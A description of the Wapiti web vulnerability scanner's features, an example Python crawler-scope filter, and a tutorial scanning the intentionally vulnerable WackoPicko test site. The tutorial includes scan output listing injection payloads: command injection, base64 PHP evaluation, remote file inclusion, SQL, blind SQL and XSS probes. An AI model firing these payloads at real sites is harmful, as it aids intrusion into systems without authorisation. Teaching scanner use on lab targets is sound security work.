General features
Generates vulnerability reports in various formats (HTML, XML, JSON, TXT...).
Can suspend and resume a scan or an attack (session mechanism using sqlite3 databases).
Can give you colors in the terminal to highlight vulnerabilities.
Different levels of verbosity.
Fast and easy way to activate/deactivate attack modules.
Adding a payload can be as easy as adding a line to a text file.
Browsing features
Supports HTTP, HTTPS and SOCKS5 proxies.
Authentication on the target via several methods: Basic, Digest, Kerberos or NTLM.
Ability to restrict the scope of the scan (domain, folder, page, url).
Automatic removal of one or more parameters in URLs.
Multiple safeguards against endless scan loops (for example, a limit on the number of values tried for a parameter).
Possibility to set the first URLs to explore (even if not in scope).
Can exclude some URLs from the scan and attacks (e.g. the logout URL).
Import of cookies (get them with the wapiti-getcookie tool).
Can activate / deactivate SSL certificate verification.
Extract URLs from Flash SWF files.
Tries to extract URLs from JavaScript (very basic JS interpreter).
HTML5 aware (understands recent HTML tags).
Several options to control the crawler behavior and limits.
Skipping some parameter names during attacks.
Setting a maximum time for the scan process.
Adding some custom HTTP headers or setting a custom User-Agent.
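The scope, exclusion and loop-safeguard features listed above are easiest to understand with a small crawler-side filter. The following is an added example written for this page, not Wapiti's own implementation: the scope names (domain, folder, page, url) follow the feature list, while the function names, the trailing-`*` wildcard convention for excluded URLs and the sample URLs on the `wackopicko` host are assumptions constructed for the illustration.

```python
"""Crawler scope, URL exclusion and loop-safeguard helpers (example code,
not Wapiti's own; names and sample URLs are constructed for this page)."""
from __future__ import annotations

from collections import defaultdict
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


def in_scope(url: str, base: str, scope: str) -> bool:
    """True if `url` lies inside the scan scope derived from the start URL `base`.

    domain: same host; folder: same host and under the base directory;
    page: same path (query may differ); url: exact path and query.
    """
    u, b = urlsplit(url), urlsplit(base)
    if u.scheme not in ("http", "https") or u.netloc.lower() != b.netloc.lower():
        return False
    if scope == "domain":
        return True
    if scope == "folder":
        base_dir = b.path.rsplit("/", 1)[0] + "/"   # "/users/login.php" -> "/users/"
        return u.path.startswith(base_dir)
    if scope == "page":
        return u.path == b.path
    if scope == "url":
        return u.path == b.path and u.query == b.query
    raise ValueError(f"unknown scope {scope!r}")


def is_excluded(url: str, excluded: list[str]) -> bool:
    """URL exclusion list (the -x use case): an entry matches the URL with or
    without its query string; an entry ending in '*' matches by prefix
    (the wildcard rule is this example's own convention)."""
    path_only = url.split("?", 1)[0]
    for pattern in excluded:
        if pattern.endswith("*"):
            if url.startswith(pattern[:-1]):
                return True
        elif url == pattern or path_only == pattern:
            return True
    return False


def remove_params(url: str, names: set[str]) -> str:
    """Drop the named query parameters (e.g. session ids or cache busters)
    so the same resource is not crawled once per parameter value."""
    parts = urlsplit(url)
    kept = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
            if k not in names]
    return urlunsplit(parts._replace(query=urlencode(kept)))


class ParamValueLimiter:
    """Endless-loop safeguard: once a parameter of a given path has been seen
    with `max_values` distinct values, any further new value is refused
    (think of a calendar page that always links to the next day)."""

    def __init__(self, max_values: int = 3):
        self.max_values = max_values
        self._seen: dict[tuple[str, str], set[str]] = defaultdict(set)

    def accept(self, url: str) -> bool:
        parts = urlsplit(url)
        pairs = parse_qsl(parts.query, keep_blank_values=True)
        # Check every parameter before recording anything, so a refused URL
        # leaves the counters untouched.
        for name, value in pairs:
            values = self._seen[(parts.path, name)]
            if value not in values and len(values) >= self.max_values:
                return False
        for name, value in pairs:
            self._seen[(parts.path, name)].add(value)
        return True


def should_crawl(url: str, base: str, scope: str, excluded: list[str],
                 dropped_params: set[str], limiter: ParamValueLimiter) -> str | None:
    """Apply all filters in order; return the normalised URL to crawl, or None."""
    url = remove_params(url, dropped_params)
    if not in_scope(url, base, scope) or is_excluded(url, excluded):
        return None
    if not limiter.accept(url):
        return None
    return url


if __name__ == "__main__":
    # Constructed demo: folder scope on /users/, logout excluded, cache buster dropped.
    limiter = ParamValueLimiter(max_values=2)
    for candidate in ("http://wackopicko/users/view.php?id=1&_=123",
                      "http://wackopicko/users/logout.php",
                      "http://wackopicko/admin/index.php?page=login",
                      "http://wackopicko/users/view.php?id=2",
                      "http://wackopicko/users/view.php?id=3"):
        print(candidate, "->", should_crawl(candidate, "http://wackopicko/users/login.php",
                                            "folder", ["http://wackopicko/users/logout.php"],
                                            {"_"}, limiter))
```

The order in `should_crawl` matters: parameters are stripped first so that the exclusion list and the per-parameter counters operate on the canonical URL rather than on every cache-busted variant of it.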
Looking at the official sample report shows how scanning with cookies and with a username and password is supported:
Hello,
Here is a really fast tutorial on Wapiti and Wapiti-getcookie usage to show how to login to a website to retrieve cookies
then use the generated cookie file to launch a Wapiti scan.
First, I use wapiti-getcookie to log in to the restricted area and get the cookie in cookies.json:
bash-4.2$ wapiti-getcookie -u http://wackopicko/users/login.php -c cookies.json
Choose the form you want to use or enter 'q' to leave :
0) GET http://wackopicko/pictures/search.php?query=&x=1&y=1 (0)
1) POST http://wackopicko/users/login.php (0)
data: username=&password=
Enter a number : 1
Please enter values for the following form:
url = http://wackopicko/users/login.php
username: wanda
password: wanda
It can also be done with wapiti-getcookie this way (if you have all the necessary information about the form):
wapiti-getcookie -u http://wackopicko/users/login.php -c cookies.json -d "username=wanda&password=wanda"
Then, I scan the vulnerable website using the cookie and excluding the logout script:
bash-4.2$ wapiti -u http://wackopicko/ -x http://wackopicko/users/logout.php -c cookies.json
Wapiti-3.0.0 (wapiti.sourceforge.net)
[*] Saving scan state, please wait...
Note
========
This scan has been saved in the file /home/devloop/.wapiti/scans/wackopicko_folder_30e1d821.db
[*] Wapiti found 41 URLs and forms during the scan
[*] Loading modules:
mod_crlf, mod_exec, mod_file, mod_sql, mod_xss, mod_backup, mod_htaccess, mod_blindsql, mod_permanentxss, mod_nikto, mod_delay, mod_buster, mod_shellshock
[*] Launching module exec
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
GET /users/WackoPicko/website/admin/index.php?page=%3Benv HTTP/1.1
Host: wackopicko
---
---
PHP evaluation in http://wackopicko/admin/index.php via injection in the parameter page
Evil request:
GET /users/WackoPicko/website/admin/index.php?page=data%3A%3Bbase64%2CPD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA%2FPg%3D%3D HTTP/1.1
Host: wackopicko
---
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
POST /users/WackoPicko/website/admin/index.php?page=%3Benv HTTP/1.1
Host: wackopicko
Referer: http://wackopicko/admin/index.php?page=login
Content-Type: application/x-www-form-urlencoded
adminname=default&password=letmein
---
---
PHP evaluation in http://wackopicko/admin/index.php via injection in the parameter page
Evil request:
POST /users/WackoPicko/website/admin/index.php?page=data%3A%3Bbase64%2CPD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA%2FPg%3D%3D HTTP/1.1
Host: wackopicko
Referer: http://wackopicko/admin/index.php?page=login
Content-Type: application/x-www-form-urlencoded
adminname=default&password=letmein
---
[*] Launching module file
---
Remote inclusion vulnerability in http://wackopicko/admin/index.php via injection in the parameter page
Evil request:
GET /users/WackoPicko/website/admin/index.php?page=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: wackopicko
---
---
Remote inclusion vulnerability in http://wackopicko/admin/index.php via injection in the parameter page
Evil request:
POST /users/WackoPicko/website/admin/index.php?page=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: wackopicko
Referer: http://wackopicko/admin/index.php?page=login
Content-Type: application/x-www-form-urlencoded
adminname=default&password=letmein
---
[*] Launching module sql
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
GET /users/WackoPicko/website/admin/index.php?page=%C2%BF%27%22%28 HTTP/1.1
Host: wackopicko
---
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
POST /users/WackoPicko/website/admin/index.php?page=%C2%BF%27%22%28 HTTP/1.1
Host: wackopicko
Referer: http://wackopicko/admin/index.php?page=login
Content-Type: application/x-www-form-urlencoded
adminname=default&password=letmein
---
[*] Launching module xss
---
XSS vulnerability in http://wackopicko/pictures/search.php via injection in the parameter query
Evil request:
GET /users/WackoPicko/website/pictures/search.php?query=%22%2F%3E%3Cscript%3Ealert%28%27wj6bncic12%27%29%3C%2Fscript%3E&x=1&y=1 HTTP/1.1
Host: wackopicko
Referer: http://wackopicko/
---
[*] Launching module blindsql
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
GET /users/WackoPicko/website/admin/index.php?page=sleep%287%29%231 HTTP/1.1
Host: wackopicko
---
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
POST /users/WackoPicko/website/admin/index.php?page=sleep%287%29%231 HTTP/1.1
Host: wackopicko
Referer: http://wackopicko/admin/index.php?page=login
Content-Type: application/x-www-form-urlencoded
adminname=default&password=letmein
---
[*] Launching module permanentxss
Report
------
A report has been generated in the file /home/devloop/.wapiti/generated_report
Open /home/devloop/.wapiti/generated_report/wackopicko_12292017_1342.html with a browser to see this report.